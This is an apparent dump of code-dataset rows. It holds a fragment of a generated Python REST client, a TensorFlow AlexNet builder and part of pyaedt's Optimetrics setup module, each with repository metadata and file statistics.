auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_product_from_bundle(self, bundle_id, product_id, **kwargs):
"""
Remove product from bundle
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.remove_product_from_bundle(bundle_id, product_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int bundle_id: Bundle ID to fetch (required)
:param int product_id: Product ID to remove (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.remove_product_from_bundle_with_http_info(bundle_id, product_id, **kwargs)
else:
(data) = self.remove_product_from_bundle_with_http_info(bundle_id, product_id, **kwargs)
return data
def remove_product_from_bundle_with_http_info(self, bundle_id, product_id, **kwargs):
"""
Remove product from bundle
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.remove_product_from_bundle_with_http_info(bundle_id, product_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int bundle_id: Bundle ID to fetch (required)
:param int product_id: Product ID to remove (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bundle_id', 'product_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_product_from_bundle" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bundle_id' is set
if ('bundle_id' not in params) or (params['bundle_id'] is None):
raise ValueError("Missing the required parameter `bundle_id` when calling `remove_product_from_bundle`")
# verify the required parameter 'product_id' is set
if ('product_id' not in params) or (params['product_id'] is None):
raise ValueError("Missing the required parameter `product_id` when calling `remove_product_from_bundle`")
collection_formats = {}
resource_path = '/bundles/{bundle_id}/{product_id}'.replace('{format}', 'json')
path_params = {}
if 'bundle_id' in params:
path_params['bundle_id'] = params['bundle_id']
if 'product_id' in params:
path_params['product_id'] = params['product_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.439891
| 122
| 0.584176
| 1,654
| 15,533
| 5.230351
| 0.099758
| 0.052711
| 0.024159
| 0.029476
| 0.913767
| 0.87539
| 0.867992
| 0.846839
| 0.828575
| 0.824413
| 0
| 0.000581
| 0.334707
| 15,533
| 365
| 123
| 42.556164
| 0.836559
| 0.307668
| 0
| 0.679558
| 1
| 0
| 0.192569
| 0.055121
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038674
| false
| 0
| 0.038674
| 0
| 0.132597
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
464c6b1d8ffa3565b8ebb0a75bbaf2b8eb0a6afc
| 998
|
py
|
Python
|
ImageClassification/network/AlexNet.py
|
yuxiaoke/DeepLearningTutorial-master
|
1a2f135d6e5a168659e58ba4053e9f0d72eb0706
|
[
"MIT"
] | 83
|
2020-03-27T03:21:48.000Z
|
2022-03-26T13:14:01.000Z
|
ImageClassification/network/AlexNet.py
|
gordenxu/DeepLearningTutorial
|
bf9d2903de3d2ddc2767d040b55dca9e7f34689a
|
[
"MIT"
] | 8
|
2020-09-25T21:54:04.000Z
|
2022-03-12T00:19:52.000Z
|
ImageClassification/network/AlexNet.py
|
gordenxu/DeepLearningTutorial
|
bf9d2903de3d2ddc2767d040b55dca9e7f34689a
|
[
"MIT"
] | 39
|
2020-04-20T04:45:34.000Z
|
2022-03-30T08:22:18.000Z
|
import tensorflow as tf
def build_alexnet():
net = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(filters=96, kernel_size=11, strides=4, activation='relu'),
tf.keras.layers.MaxPool2D(pool_size=3, strides=2),
tf.keras.layers.Conv2D(filters=256, kernel_size=5, padding='same', activation='relu'),
tf.keras.layers.MaxPool2D(pool_size=3, strides=2),
tf.keras.layers.Conv2D(filters=384, kernel_size=3, padding='same', activation='relu'),
tf.keras.layers.Conv2D(filters=384, kernel_size=3, padding='same', activation='relu'),
tf.keras.layers.Conv2D(filters=256, kernel_size=3, padding='same', activation='relu'),
tf.keras.layers.MaxPool2D(pool_size=3, strides=2),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(4096, activation='relu'),
tf.keras.layers.Dropout(0.5),
tf.keras.layers.Dense(4096, activation='relu'),
tf.keras.layers.Dropout(0.5),
tf.keras.layers.Dense(10, activation='softmax')]) # for imagenet:1000
return net
| 39.92
| 90
| 0.707415
| 146
| 998
| 4.773973
| 0.287671
| 0.150646
| 0.261119
| 0.210904
| 0.807747
| 0.770445
| 0.770445
| 0.770445
| 0.747489
| 0.747489
| 0
| 0.060364
| 0.12024
| 998
| 24
| 91
| 41.583333
| 0.733485
| 0.017034
| 0
| 0.5
| 0
| 0
| 0.052361
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
468b5f60335a5677c7e97927c38970506b4e2c0a
| 54,542
|
py
|
Python
|
pyaedt/modules/DesignXPloration.py
|
Zwl20085/PyAEDT-Motor
|
e50de4d96210c32f23647138421aa86f0d9ce554
|
[
"MIT"
] | null | null | null |
pyaedt/modules/DesignXPloration.py
|
Zwl20085/PyAEDT-Motor
|
e50de4d96210c32f23647138421aa86f0d9ce554
|
[
"MIT"
] | null | null | null |
pyaedt/modules/DesignXPloration.py
|
Zwl20085/PyAEDT-Motor
|
e50de4d96210c32f23647138421aa86f0d9ce554
|
[
"MIT"
] | null | null | null |
from collections import OrderedDict
from ..generic.general_methods import aedt_exception_handler, generate_unique_name
from ..application.DataHandlers import dict2arg, arg2dict
import copy
defaultparametricSetup = OrderedDict({"IsEnabled": True, "ProdOptiSetupDataV2":
OrderedDict({"SaveFields": False, "CopyMesh": False, "SolveWithCopiedMeshOnly": True}),
"StartingPoint": OrderedDict(), "Sim. Setups": [],
"Sweeps": OrderedDict({"SweepDefinition":
OrderedDict({"Variable": "",
"Data": "",
"OffsetF1": False,
"Synchronize": 0})}),
"Sweep Operations": OrderedDict(),
"Goals": OrderedDict()})
defaultdxSetup = OrderedDict({"IsEnabled": True, "ProdOptiSetupDataV2":
OrderedDict({"SaveFields": False, "CopyMesh": False, "SolveWithCopiedMeshOnly": True}),
"StartingPoint": OrderedDict(), "Sim. Setups": [],
"Sweeps": OrderedDict({"SweepDefinition":
OrderedDict({"Variable": "",
"Data": "",
"OffsetF1": False,
"Synchronize": 0})}),
"Sweep Operations": OrderedDict(), "CostFunctionName": "Cost", "CostFuncNormType": "L2",
"CostFunctionGoals": OrderedDict(),"EmbeddedParamSetup": -1, "Goals": OrderedDict()})
defaultoptiSetup = OrderedDict({"IsEnabled": True, "ProdOptiSetupDataV2":
OrderedDict({"SaveFields": False, "CopyMesh": False, "SolveWithCopiedMeshOnly": True}),
"StartingPoint": OrderedDict(), "Optimizer": "Quasi Newton",
"AnalysisStopOptions": OrderedDict({"StopForNumIteration": True,
"StopForElapsTime": False,
"StopForSlowImprovement": False,
"StopForGrdTolerance": False,
"MaxNumIteration": 1000,
"MaxSolTimeInSec": 3600,
"RelGradientTolerance": 0,
"MinNumIteration": 10
}),
"CostFuncNormType": "L2", "PriorPSetup": "", "PreSolvePSetup": True,
"Variables": OrderedDict(), "LCS": OrderedDict(), "Goals": OrderedDict(),
"Acceptable_Cost": 0, "Noise": 0.0001, "UpdateDesign": False, "UpdateIteration": 5,
"KeepReportAxis": True, "UpdateDesignWhenDone": True})
defaultsensitivitySetup = OrderedDict({"IsEnabled": True, "ProdOptiSetupDataV2":
OrderedDict({"SaveFields": False, "CopyMesh": False, "SolveWithCopiedMeshOnly": True}),
"StartingPoint": OrderedDict(), "MaxIterations": 10,
"PriorPSetup": "", "PreSolvePSetup": True, "Variables": OrderedDict(),
"LCS": OrderedDict(), "Goals": OrderedDict(), "Primary Goal": 0,
"PrimaryError": 0.0001, "Perform Worst Case Analysis": False})
defaultstatisticalSetup = OrderedDict({"IsEnabled": True, "ProdOptiSetupDataV2":
OrderedDict({"SaveFields": False, "CopyMesh": False, "SolveWithCopiedMeshOnly": True}),
"StartingPoint": OrderedDict(), "MaxIterations": 50,
"SeedValue": 0, "PriorPSetup": "", "Variables": OrderedDict(),
"Goals": OrderedDict()})
defaultdoeSetup = OrderedDict({"IsEnabled": True, "ProdOptiSetupDataV2":
OrderedDict({"SaveFields": False, "CopyMesh": False, "SolveWithCopiedMeshOnly": True}),
"StartingPoint": OrderedDict(), "Sim. Setups": [],
"CostFunctionName": "Cost",
"CostFuncNormType": "L2", "CostFunctionGoals": OrderedDict(), "Variables": OrderedDict(),
"Goals": OrderedDict(),
"DesignExprData": OrderedDict({"Type": "kOSF", "CCDDeignType": "kFaceCentered",
"CCDTemplateType": "kStandard",
"LHSSampleType": "kCCDSample",
"RamdomSeed": 0, "NumofSamples": 10,
"OSFDeignType": "kOSFD_MAXIMINDIST",
"MaxCydes": 10}),
"RespSurfaceSetupData": OrderedDict({"Type": "kGenAggr", "RefineType": "kManual"}),
"ResponsePoints": OrderedDict({"NumOfStrs": 0}),
"ManualRefinePoints": OrderedDict({"NumOfStrs": 0}),
"CustomVerifyPoints": OrderedDict({"NumOfStrs": 0}), "Tolerances": []})
class CommonOptimetrics(object):
"""Creates and sets up optimizations.
Parameters
----------
parent :
name :
dictinputs
optimtype : str
Type of the optimization.
"""
@property
def omodule(self):
"""Module.
Returns
-------
:class:`Optimetrics`
Optimetrics object.
"""
return self._parent.odesign.GetModule("Optimetrics")
def __init__(self, parent, name, dictinputs, optimtype):
self._parent = parent
self.name = name
self.soltype = optimtype
inputd = copy.deepcopy(dictinputs)
if optimtype == "OptiParametric":
self.props = inputd or defaultparametricSetup
if optimtype == "OptiDesignExplorer":
self.props = inputd or defaultdxSetup
if optimtype == "OptiOptimization":
self.props = inputd or defaultoptiSetup
if optimtype == "OptiSensitivity":
self.props = inputd or defaultsensitivitySetup
if optimtype == "OptiStatistical":
self.props = inputd or defaultstatisticalSetup
if optimtype == "OptiDXDOE":
self.props = inputd or defaultdoeSetup
if inputd:
self.props.pop('ID', None)
self.props.pop('NextUniqueID', None)
self.props.pop('MoveBackwards', None)
self.props.pop('GoalSetupVersion', None)
self.props.pop('Version', None)
self.props.pop('SetupType', None)
if inputd.get("Sim. Setups"):
setups = inputd["Sim. Setups"]
for el in setups:
if type(self._parent.design_properties["SolutionManager"]['ID Map']['Setup']) is list:
for setup in self._parent.design_properties["SolutionManager"]['ID Map']['Setup']:
if setup['I'] == el:
setups[setups.index(el)]= setup['I']
break
else:
if self._parent.design_properties["SolutionManager"]['ID Map']['Setup']['I'] == el:
setups[setups.index(el)] = self._parent.design_properties["SolutionManager"]['ID Map']['Setup']['N']
break
if inputd.get("Goals", None):
oparams = self.omodule.GetChildObject(self.name).GetCalculationInfo()
oparam = [i for i in oparams[0]]
calculation = ["NAME:Goal"]
calculation.extend(oparam)
arg1 = OrderedDict()
arg2dict(calculation, arg1)
self.props['Goals'] = arg1
@aedt_exception_handler
def update(self, update_dictionary=None):
"""Update the setup based on stored properties.
Parameters
----------
update_dictionary : dict, optional
Dictionary to use. The default is ``None``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
if update_dictionary:
for el in update_dictionary:
self.props[el]=update_dictionary[el]
arg = ["NAME:" + self.name]
dict2arg(self.props, arg)
self.omodule.EditSetup(self.name, arg)
return True
@aedt_exception_handler
def create(self):
"""Create a setup.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
arg = ["NAME:" + self.name]
dict2arg(self.props, arg)
self.omodule.InsertSetup(self.soltype, arg)
return True
@aedt_exception_handler
def _add_calculation(self, reporttype, solution=None, domain="Sweep", calculation="", calculation_type="d",
calculation_value="", calculation_name=None):
"""Add a calculation to the setup.
Parameters
----------
reporttype : str
Type of report.
solution : str, optional
Type of the solution. The default is ``None``.
domain : str, optional
Type of the domain. The default is ``"Sweep"``.
calculation : str, optional
The default is ``""``.
calculation_type : str, optional
Type of the calculaton. The default is ``"d"``.
calculation_value : str, optional
The default is ``""``.
calculation_name : str, optional
Name of the the calculation. The default is ``None``.
Returns
-------
"""
sweepdefinition = OrderedDict()
sweepdefinition["ReportType"] = reporttype
if not solution:
solution = self._parent.nominal_sweep
sweepdefinition["Solution"] = solution
sweepdefinition["SimValueContext"] = OrderedDict({"Domain": domain})
sweepdefinition["Calculation"] = calculation
if calculation_name:
sweepdefinition["Name"] = calculation_name
else:
sweepdefinition["Name"] = generate_unique_name(calculation)
if domain == "Sweep":
var = "Freq"
else:
var ="Time"
sweepdefinition["Ranges"] = OrderedDict(
{"Range": ["Var:=", var, "Type:=", calculation_type, "DiscreteValues:=", calculation_value]})
if "Goal" in self.props["Goals"]:
if type(self.props["Goals"]["Goal"]) is not list:
self.props["Goals"]["Goal"] = [self.props["Goals"]["Goal"], sweepdefinition]
else:
self.props["Goals"]["Goal"].append(sweepdefinition)
else:
self.props["Goals"]["Goal"] = sweepdefinition
return self.update()
@aedt_exception_handler
def _add_goal(self, optigoalname, reporttype, solution=None, domain="Sweep", calculation="", calculation_type="discrete",
calc_val1="", calc_val2="", condition="==", goal_value=1, goal_weight=1, goal_name=None):
"""Add an optimization goal to the setup.
Parameters
----------
optigoalname : str
Name of the optimization goal.
reporttype : str, optional
Type of the report.
solution : str, optional
Type of the solution. The default is ``None``.
domain : str, optional
Type of the domain. The default is ``"Sweep"''.
calculation : str, optional
Name of the calculation. The default is ``""``.
calculation_type : str, optional
Type of the calculation. The default is ``"discrete"``.
calc_val1 : str, optional
First value for the calculation. The default is ``""``.
calc_val2 : str, optional
Second value for the calculation. The default is ``""``.
condition : str, optional
The condition for the calculation. The default is ``"=="``.
goal_value : optional
Value for the optimization goal. The default is ``1``.
goal_weight : optional
Weight for the optimzation goal. The default is ``1``.
goal_name : str, optional
Name of the goal. The default is ``None``.
Returns
-------
"""
sweepdefinition = OrderedDict()
sweepdefinition["ReportType"] = reporttype
if not solution:
solution = self._parent.nominal_sweep
sweepdefinition["Solution"] = solution
sweepdefinition["SimValueContext"] = OrderedDict({"Domain": domain})
sweepdefinition["Calculation"] = calculation
if goal_name:
sweepdefinition["Name"] = goal_name
else:
sweepdefinition["Name"] = generate_unique_name(calculation)
if domain == "Sweep":
var = "Freq"
else:
var ="Time"
if calculation_type =="discrete":
if type(calc_val1) is list:
dr = ",".join(calc_val1)
else:
dr = calc_val1
sweepdefinition["Ranges"] = OrderedDict(
{"Range": ["Var:=", var, "Type:=", "d", "DiscreteValues:=", dr]})
else:
sweepdefinition["Ranges"] = OrderedDict({"Range": ["Var:=", var, "Type:=", calculation_type,
"Start:=", calc_val1, "Stop:=", calc_val2,
"DiscreteValues:=", ""]})
sweepdefinition["Condition"] = condition
sweepdefinition["GoalValue"] = OrderedDict(
{"GoalValueType": "Independent", "Format": "Real/Imag", "bG": ["v:=", "[{};]".format(goal_value)]})
sweepdefinition["Weight"] = "[{};]".format(goal_weight)
if "Goal" in self.props[optigoalname]:
if type(self.props[optigoalname]["Goal"]) is not list:
self.props[optigoalname]["Goal"] = [self.props[optigoalname]["Goal"], sweepdefinition]
else:
self.props[optigoalname]["Goal"].append(sweepdefinition)
else:
self.props[optigoalname]["Goal"] = sweepdefinition
return self.update()
class DXSetups(object):
"""Sets up DesignXplorer optimizations.
Parameters
----------
parent :
"""
class Setup(CommonOptimetrics, object):
"""Sets up a DesignXplorer optimization in optiSLang.
Parameters
----------
parent :
name :
dictinputs :
The default is ``None``.
optimtype : str, optional
Type of the optimization. The default is ``"OptiDesignExplorer"``.
"""
def __init__(self, parent, name, dictinputs=None):
CommonOptimetrics.__init__(self, parent, name, dictinputs=dictinputs, optimtype="OptiDesignExplorer")
@aedt_exception_handler
def add_calculation(self, calculation="", calculation_value="", reporttype="Modal Solution Data", solution=None, domain="Sweep", calculation_name=None):
"""Add a calculation to the setup.
Parameters
----------
calculation : str, optional
Expression for the calculation, such as ``"dB(S(1,1,))"``. The default is ``""``.
calculation_value : str, optional
Value for the calculation, such as ``"1GHz"`` if a sweep. The default is ``""``.
reporttype : str, optional
Name of the report to add the calculation to. The default
is ``"Modal Solution Data"``.
solution : str, optional
Type of the solution. The default is ``None``, in which case the default
solution is used.
domain : str, optional
Type of the domain. The default is ``"Sweep"``. If ``None``, one sweep is taken.
calculation_name : str, optional
Name of the calculation. The default is ``None``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
return self._add_calculation(reporttype=reporttype, solution=solution, domain=domain, calculation_type="d",
calculation=calculation, calculation_value=calculation_value, calculation_name=calculation_name)
@aedt_exception_handler
def add_goal(self, calculation="", calculation_value="", calculation_type="discrete", calculation_stop="",
reporttype="Modal Solution Data", solution=None, domain="Sweep", goal_name=None, goal_value=1, goal_weight=1, condition="=="):
"""Add a goal to the setup.
Parameters
----------
calculation : str, optional
Expression for the calculation, such as ``"dB(S(1,1,))"``. The default is ``""``.
calculation_value : str, optional
Value for the calculation, such as ``"1GHz"`` if a sweep. The default is ``""``.
If ``calculation_type="discrete"``, the value is discrete or is a list. If the
value is a range, it is the starting value.
calculation_type : str, optional
Type of the calculation. Options are ``"discrete"`` or ``"range"``.
The default is ``"discrete"``.
calculation_stop : str, optional
Stopping value for the calculation if ``calculation_type="range"``.
The default is ``""``.
reporttype : str, optional
Name of the report to add the calculation to. The default
is ``"Modal Solution Data"``.
solution : str, optional
Type of the solution. The default is ``None``, in which case the default
solution is used.
domain : str, optional
Type of the domain. The default is ``"Sweep"``. If ``None``, one sweep is taken.
goal_name : str, optional
Name of the goal. The default is ``None``.
goal_value : optional
Value for the goal. The default is ``1``.
goal_weight : optional
Value for the goal weight. The default is ``1``.
condition : string, optional
The default is ``"=="``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
return self._add_goal(optigoalname="CostFunctionGoals", reporttype=reporttype, solution=solution,
domain=domain, calculation_type=calculation_type, calculation=calculation,
calc_val1=calculation_value, calc_val2=calculation_stop, goal_name=goal_name,
goal_weight=goal_weight, goal_value=goal_value, condition=condition)
@property
def parent(self):
"""Parent."""
return self._parent
@property
def optimodule(self):
"""Optimetrics module.
Returns
:class:`Optimetrics`
"""
return self.parent.odesign.GetModule("Optimetrics")
def __init__(self, parent):
self._parent = parent
self.setups = []
if self._parent.design_properties:
try:
setups_data = self._parent.design_properties["Optimetrics"]["OptimetricsSetups"]
for data in setups_data:
if type(setups_data[data]) is OrderedDict and setups_data[data]['SetupType'] == "OptiDesignExplorer":
self.setups.append(self.Setup(parent, data, setups_data[data]))
except:
pass
@aedt_exception_handler
def add_dx_setup(self,variables_to_include, defaults_var_values=None, setupname=None, parametricname=None):
"""Add a basic parametric setup in DesignXplorer.
You can customize all DesignXplorer options after the setup is added.
Parameters
----------
variables_to_include : list
List of variables to include in DesignXplorer.
defaults_var_values : list, optional
List of default variable values.
setupname : str, optional
Name of the setup. The default is ``None``, in which case the default
analysis setup is used.
parametricname : str, optional
Name of the parametric setup. The default is ``None``.
Returns
-------
:class:`Optimetrics`
"""
if not setupname:
setupname = [self._parent.analysis_setup]
elif type(setupname) is not list:
setupname = [setupname]
if not parametricname:
parametricname = generate_unique_name("DesignXplorer")
setup = self.Setup(self._parent, parametricname)
setup.props["Sim. Setups"] = setupname
setup.props['Sweeps'] = []
if not defaults_var_values:
for v in variables_to_include:
sweepdefinition = OrderedDict()
sweepdefinition["Variable"] = v
if "$" in v:
sweepdefinition["Data"] = self._parent.oproject.GetVariableValue(v)
else:
sweepdefinition["Data"] = self._parent.odesign.GetVariableValue(v)
sweepdefinition["OffsetF1"] = False
sweepdefinition["Synchronize"] = 0
else:
for v,vv in zip(variables_to_include, defaults_var_values):
sweepdefinition = OrderedDict()
sweepdefinition["Variable"] = v
sweepdefinition["Data"] = vv
sweepdefinition["OffsetF1"] = False
sweepdefinition["Synchronize"] = 0
setup.props['Sweeps'].append(sweepdefinition)
setup.props["StartingPoint"][v] = vv
setup.create()
self.setups.append(setup)
return setup
class ParametericsSetups(object):
"""Sets up parametric analyses.
Parameters
----------
parent :
"""
class Setup(CommonOptimetrics, object):
"""Sets up a parametric analysis in optiSLang.
Parameters
----------
parent : str
Inherited AEDT object.
name :
dictinputs : optional
The default is ``None``.
otimtype : str, optional
Type of the optimization. The default is ``"OptiParametric"``.
"""
def __init__(self, parent, name, dictinputs=None):
CommonOptimetrics.__init__(self, parent, name, dictinputs=dictinputs, optimtype="OptiParametric")
pass
@aedt_exception_handler
def add_variation(self, sweep_var, datarange):
"""Add a variation to an existing parametric setup.
Parameters
----------
sweep_var : str
Name of the variable.
datarange :
Range of the data.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
if type(self.props["Sweeps"]["SweepDefinition"]) is not list:
self.props["Sweeps"]["SweepDefinition"] = [self.props["Sweeps"]["SweepDefinition"]]
sweepdefinition = OrderedDict()
sweepdefinition["Variable"] = sweep_var
sweepdefinition["Data"] = datarange
sweepdefinition["OffsetF1"] = False
sweepdefinition["Synchronize"] = 0
self.props["Sweeps"]["SweepDefinition"].append(sweepdefinition)
self.update()
return True
@aedt_exception_handler
def add_calculation(self, calculation="", calculation_value="", reporttype="Modal Solution Data", solution=None,
domain="Sweep", calculation_name=None):
"""Add a calculation to the parametric setup.
Parameters
----------
calculation : str, optional
Expression for the calculation, such as ``"dB(S(1,1,))"``. The default is ``""``.
calculation_value : str, optional
Value for the calculation, such as ``"1GHz"`` if a sweep. The default is ``""``.
reporttype : str, optional
Name of the report to add the calculation to. The default
is ``"Modal Solution Data"``.
solution : str, optional
Type of the solution. The default is ``None``, in which case the default
solution is used.
domain : str, optional
Type of the domain. The default is ``"Sweep"``. If ``None``, one sweep is taken.
calculation_name : str, optional
Name of the calculation. The default is ``None``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
return self._add_calculation(reporttype=reporttype, solution=solution, domain=domain, calculation_type="d",
calculation=calculation, calculation_value=calculation_value, calculation_name=calculation_name)
@property
def parent(self):
"""Parent."""
return self._parent
@property
def optimodule(self):
"""Optimetrics module.
Returns
-------
:class:`Optimetrics`
"""
return self.parent.odesign.GetModule("Optimetrics")
def __init__(self, parent):
self._parent = parent
self.setups = []
if self._parent.design_properties:
try:
setups_data = self._parent.design_properties["Optimetrics"]["OptimetricsSetups"]
for data in setups_data:
if type(setups_data[data]) is OrderedDict and setups_data[data]['SetupType'] == "OptiParametric":
self.setups.append(self.Setup(parent, data, setups_data[data]))
except:
pass
@aedt_exception_handler
def add_parametric_setup(self, sweep_var, datarange, setupname=None, parametricname=None):
"""Add a basic parametric setup.
You can customize all options after the parametric setup is added.
Parameters
----------
sweep_var : str
Name of the sweep.
datarange :
Range of the data.
setupname : str, optional
Name of the setup. The default is ``None``, in which case the default
parametric setup is used.
parametricname : str, optional
Name of the parametric setup. The default is ``None``.
Returns
-------
:class:`Optimetrics`
Optimetrics object.
"""
if not setupname:
setupname = [self._parent.analysis_setup]
elif type(setupname) is not list:
setupname = [setupname]
if not parametricname:
parametricname = generate_unique_name("Parametric")
setup = self.Setup(self._parent, parametricname)
setup.props["Sim. Setups"] = setupname
sweepdefinition = OrderedDict()
sweepdefinition["Variable"] = sweep_var
sweepdefinition["Data"] = datarange
sweepdefinition["OffsetF1"] = False
sweepdefinition["Synchronize"] = 0
setup.props["Sweeps"]["SweepDefinition"] = sweepdefinition
setup.create()
self.setups.append(setup)
return setup
class SensitivitySetups(object):
"""Sets up sensitivity analyses.
Parameters
----------
parent :
"""
class Setup(CommonOptimetrics, object):
"""Sets up a sensitivity analysis in optiSLang.
Parameters
----------
parent :
name :
dictinputs : optional
The default is ``None``.
otimtype : str, optional
Type of the optimization. The default is ``"OptiSensitivity"``.
"""
def __init__(self, parent, name, dictinputs=None):
CommonOptimetrics.__init__(self, parent, name, dictinputs=dictinputs, optimtype="OptiSensitivity")
@aedt_exception_handler
def add_calculation(self, calculation="", calculation_value="", reporttype="Modal Solution Data", solution=None,
domain="Sweep", calculation_name=None):
"""Add a calculation to the sensitivity analysis.
Parameters
----------
calculation : str, optional
Expression for the calculation, such as ``"dB(S(1,1,))"``. The default is ``""``.
calculation_value : str, optional
Value for the calculation, such as ``"1GHz"`` if a sweep. The default is ``""``.
reporttype : str, optional
Name of the report to add the calculation to. The default
is ``"Modal Solution Data"``.
solution : str, optional
Type of the solution. The default is ``None``, in which case the default
solution is used.
domain : str, optional
Type of the domain. The default is ``"Sweep"``. If ``None``, one sweep is taken.
calculation_name : str, optional
Name of the calculation. The default is ``None``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
return self._add_calculation(reporttype=reporttype, solution=solution, domain=domain, calculation_type="d",
calculation=calculation, calculation_value=calculation_value, calculation_name=calculation_name)
@property
def parent(self):
"""Parent."""
return self._parent
@property
def optimodule(self):
"""Optimetrics module.
Returns
-------
:class:`Optimetrics`
"""
return self.parent.odesign.GetModule("Optimetrics")
def __init__(self, parent):
self._parent = parent
self.setups = []
if self._parent.design_properties:
try:
setups_data = self._parent.design_properties["Optimetrics"]["OptimetricsSetups"]
for data in setups_data:
if type(setups_data[data]) is OrderedDict and setups_data[data]['SetupType'] == "OptiSensitivity":
self.setups.append(self.Setup(parent, data, setups_data[data]))
except:
pass
@aedt_exception_handler
def add_sensitivity(self, calculation, calculation_value, calculation_type="Freq",
reporttype="Modal Solution Data", domain="Sweep", solution=None, parametricname=None):
"""Add a basic sensitivity analysis.
You can customize all options after the analysis is added.
Parameters
----------
calculation : str, optional
Expression for the calculation, such as ``"dB(S(1,1,))"``. The default is ``""``.
calculation_value : str, optional
Value for the calculation, such as ``"1GHz"`` if a sweep. The default is ``""``.
calculation_type : str, optional
Type of variation. The default is ``"Freq"``.
reporttype : str, optional
Name of the report to add the calculation to. The default
is ``"Modal Solution Data"``.
domain : str, optional
Type of the domain. The default is ``"Sweep"``. If ``None``, one sweep is taken.
solution : str, optional
Type of the solution. The default is ``None``, in which case the default
solution is used.
parametricname : str, optional
Name of the sensitivity analysis. The default is ``None``, in which case
a default name is assigned.
Returns
-------
:class:`Sensitivity`
"""
if not parametricname:
parametricname = generate_unique_name("Sensitivity")
setup = self.Setup(self._parent, parametricname)
sweepdefinition = OrderedDict()
sweepdefinition["ReportType"] = reporttype
if not solution:
solution = self._parent.nominal_sweep
sweepdefinition["Solution"] = solution
sweepdefinition["SimValueContext"] = OrderedDict({"Domain": domain})
sweepdefinition["Calculation"] = calculation
sweepdefinition["Name"] = calculation
sweepdefinition["Ranges"] = OrderedDict(
{"Range": ["Var:=", calculation_type, "Type:=", "d", "DiscreteValues:=", calculation_value]})
setup.props["Goals"]["Goal"] = sweepdefinition
setup.create()
self.setups.append(setup)
return setup
class StatisticalSetups(object):
"""Sets up statistical analyses.
Parameters
----------
parent :
"""
class Setup(CommonOptimetrics, object):
"""Sets up a statistical analysis in optiSLang.
Parameters
----------
parent :
name :
dictinputs : optional
The default is ``None``.
otimtype : str, optional
Type of the optimization. The default is ``"OptiStatistical"``.
"""
def __init__(self, parent, name, dictinputs=None):
CommonOptimetrics.__init__(self, parent, name, dictinputs=dictinputs, optimtype="OptiStatistical")
pass
@aedt_exception_handler
def add_calculation(self, calculation="", calculation_value="", reporttype="Modal Solution Data", solution=None, domain="Sweep", calculation_name=None):
"""Add a calculation to the statistical analysis.
Parameters
----------
calculation : str, optional
Expression for the calculation, such as ``"dB(S(1,1,))"``. The default is ``""``.
calculation_value : str, optional
Value for the calculation, such as ``"1GHz"`` if a sweep. The default is ``""``.
reporttype : str, optional
Name of the report to add the calculation to. The default
is ``"Modal Solution Data"``.
domain : str, optional
Type of the domain. The default is ``"Sweep"``. If ``None``, one sweep is taken.
solution : str, optional
Type of the solution. The default is ``None``, in which case the default
solution is used.
calculation_name : str, optional
Name of the calculation. The default is ``None``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
return self._add_calculation(reporttype=reporttype, solution=solution, domain=domain, calculation_type="d",
calculation=calculation, calculation_value=calculation_value, calculation_name=calculation_name)
@property
def parent(self):
"""Parent."""
return self._parent
@property
def optimodule(self):
"""Optimetrics module.
Returns
-------
:class:`Optimetrics`
"""
return self.parent.odesign.GetModule("Optimetrics")
def __init__(self, parent):
self._parent = parent
self.setups = []
if self._parent.design_properties:
try:
setups_data = self._parent.design_properties["Optimetrics"]["OptimetricsSetups"]
for data in setups_data:
if type(setups_data[data]) is OrderedDict and setups_data[data]['SetupType'] == "OptiStatistical":
